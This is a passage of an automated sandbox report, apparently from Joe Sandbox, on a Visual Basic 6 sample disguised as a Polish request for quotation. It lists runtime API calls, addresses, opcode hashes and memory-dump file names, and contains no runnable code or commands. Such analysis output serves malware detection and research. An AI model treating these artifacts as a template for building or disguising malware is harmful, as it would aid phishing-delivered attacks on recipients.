                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$BoundsGenerate$Lock$SystemUnlock$DestructRedim$Chkstk
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3555954879-0
                                                                                                                                                                                                                                                      • Opcode ID: d7053a601a00c9baf09ed0f933eca4d89ef72334d0a3dcf76765fe079d3190a2
                                                                                                                                                                                                                                                      • Instruction ID: 67aec0367089ad9bdb06f85a3682bb1edb9e8b84c894a553a99a1ed1c2ada365
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7053a601a00c9baf09ed0f933eca4d89ef72334d0a3dcf76765fe079d3190a2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BED1E470D00208EFDB18DFA4DA98BDDBBB5BF48300F10815AE516B72A1DB74A985CF55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,00001000,6D05DAF4,6CF8D9F5), ref: 00420FA3
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,00001000,6D05DAF4,6CF8D9F5), ref: 00420FC5
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(00000000,00001000,6D05DAF4,6CF8D9F5), ref: 00420FD2
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00420FE6
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00420FED
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421029
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421044
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421056
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421071
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004210A0
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004210C6
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0042113B
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421149
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421160
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0042116A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421181
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0042118B
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004211A2
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004211B5
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004211CE
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004211E2
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004211F5
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421209
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421223
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421237
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421250
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421269
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421281
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0042129F
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004212B2
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004212C6
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 004212CD
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(00000000,00001000,6D05DAF4,6CF8D9F5), ref: 004212E7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$BoundsGenerate$Overflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2760075901-0
                                                                                                                                                                                                                                                      • Opcode ID: 7623d4b20da7c6b818f332ecc799d3caca9fe6e1c56e874aff0741b4b89b7b8a
                                                                                                                                                                                                                                                      • Instruction ID: 6f7972a480d0dd1fda114303b5166632bd8b31c6f1599b60b9e65e0100795082
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7623d4b20da7c6b818f332ecc799d3caca9fe6e1c56e874aff0741b4b89b7b8a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F81D835B00361C6C724AB98E9C65ADB3A3BFA9701FC10076D580A7271CF7998C1C7AE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(6CF8D8B1), ref: 00420C36
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(6CF8D8B1), ref: 00420C51
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420C6B
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420C84
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420C9B
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420CB9
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420CD3
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420CEF
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420D0A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420D24
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00420D2E
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420D42
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420D60
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00420D6A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420D7E
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420D95
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420D9F
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420DB6
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420DC9
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420DE6
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420DF0
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420E07
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420E1B
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420E32
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420E3F
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420E56
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420E6A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420E85
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420E99
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420EAE
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,6CF82523,6CF8D8B1), ref: 00420EC2
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(6CF8D8B1), ref: 00420ED8
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(6CF8D8B1), ref: 00420EDF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$BoundsErrorGenerate
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3574812510-0
                                                                                                                                                                                                                                                      • Opcode ID: 531f9eca504aa198c6c6dfefc7d7df16526d6ddf688e9b54a0de9df055713b13
                                                                                                                                                                                                                                                      • Instruction ID: aa417d5a5a3cc9c21652b4fe2a9d25cfa30c058b0be9d244c1a14ba1329cb19f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 531f9eca504aa198c6c6dfefc7d7df16526d6ddf688e9b54a0de9df055713b13
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E718935F1136586D724AB99E9C75ADB3E3BF88701FC11466C48123262DFB8A8C1C6DD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001,00000000,6CFB285F,6CFA1654), ref: 00426796
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 004267C7
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 004267DF
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426804
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426819
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 00426834
                                                                                                                                                                                                                                                      • __vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00426853
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426867
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426887
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004268A7
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 004268D5
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 004268DE
                                                                                                                                                                                                                                                      • __vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004268F8
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 00426900
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426936
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426946
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426962
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426972
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269A5
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269B5
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269FD
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A0D
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A33
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A43
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A69
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A79
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A95
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426AA2
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 00426ACD
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,00426AF5), ref: 00426AEE
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 00426B0B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2234381736-0
                                                                                                                                                                                                                                                      • Opcode ID: 8a3a9e375456d3784734aa077d45e81f9f694a82a56cb0dbdfd646f6f7379c76
                                                                                                                                                                                                                                                      • Instruction ID: 8bb1792076bedc514fb8fc9f35066fd02f5cb142c2b8cf4fa96dc0b38f9b19a4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a3a9e375456d3784734aa077d45e81f9f694a82a56cb0dbdfd646f6f7379c76
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FC17F71E001299BCF14DFA8D980AEEBBB5FF48304FA1819AD405B7240D775AD82CFA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0040B976,00000000), ref: 0041F5DE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041F60B
                                                                                                                                                                                                                                                      • __vbaFixstrConstruct.MSVBVM60(00000100,?,?,?,?,00000000,Function_000032B6), ref: 0041F61A
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F629
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(00000001,Microsoft Internet Explorer,00000001,00000000,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041F647
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F656
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041F665
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,80000000,00000000), ref: 0041F696
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F6A9
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F6B7
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F6C6
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000100,?), ref: 0041F6F5
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F705
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F713
                                                                                                                                                                                                                                                      • __vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 0041F720
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F730
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000100,00000000), ref: 0041F75E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F76E
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F77C
                                                                                                                                                                                                                                                      • __vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 0041F789
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F799
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F7B4
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F7CA
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041F811), ref: 0041F801
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F80A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • Microsoft Internet Explorer, xrefs: 0041F63E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$FreeSystem$Ansi$FixstrUnicode$ListLset$ChkstkConstructCopy
                                                                                                                                                                                                                                                      • String ID: Microsoft Internet Explorer
                                                                                                                                                                                                                                                      • API String ID: 4206449948-3125735337
                                                                                                                                                                                                                                                      • Opcode ID: cded7575dc80e55b3969bd68fd6dc42ddc0613399f5cdd5ea9fa15ec02432952
                                                                                                                                                                                                                                                      • Instruction ID: b2079e6668a1cd7a86d62b88bf03b67035dbb3734d396ffb12c1851edfe9c710
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cded7575dc80e55b3969bd68fd6dc42ddc0613399f5cdd5ea9fa15ec02432952
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4561CB75900208EFDB04EFE4EE49FDEBB78AB48705F104169F611B61A0CB746A45CB65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0042935E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 004293A3
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004293B8
                                                                                                                                                                                                                                                      • #712.MSVBVM60(?,file:///,00408114,00000001,000000FF,00000000,?,?,?,?,Function_000032B6), ref: 004293D9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004293E4
                                                                                                                                                                                                                                                      • #712.MSVBVM60(?,00409840,00406544,00000001,000000FF,00000000,?,?,?,?,Function_000032B6), ref: 00429405
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 00429410
                                                                                                                                                                                                                                                      • #572.MSVBVM60(00004002), ref: 00429469
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00429474
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000020), ref: 0042947F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0042948A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 004294B6
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(004097E0,00000000), ref: 004294C8
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 004294CF
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004294DA
                                                                                                                                                                                                                                                      • #712.MSVBVM60(?,00000000), ref: 004294E5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004294F0
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0042950C
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0042952E
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00429578), ref: 00429571
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 004295A2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
                                                                                                                                                                                                                                                      • String ID: $file:///
                                                                                                                                                                                                                                                      • API String ID: 1913684286-1087255347
                                                                                                                                                                                                                                                      • Opcode ID: 10574e520546cbbb49ac820470f987c6e6ae451a19177e6353396db4924bff4d
                                                                                                                                                                                                                                                      • Instruction ID: b77d49a70da6056938b5249be74374e1b73de407e439ef27e1b36e2e5139af87
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10574e520546cbbb49ac820470f987c6e6ae451a19177e6353396db4924bff4d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E510875E00209EBCB04DFA4DE48BDEBBB5FF08705F208269E512B72A0DB755A45CB58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000020), ref: 0041ECA0
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F1D1
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaFreeVar.MSVBVM60 ref: 0041F1DA
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F218
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F238
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: #616.MSVBVM60(?,-00000001), ref: 0041F251
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F25C
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F265
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0041ECBB
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00408114,?), ref: 0041ECD1
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00409A70,?), ref: 0041ECF1
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041ECFC
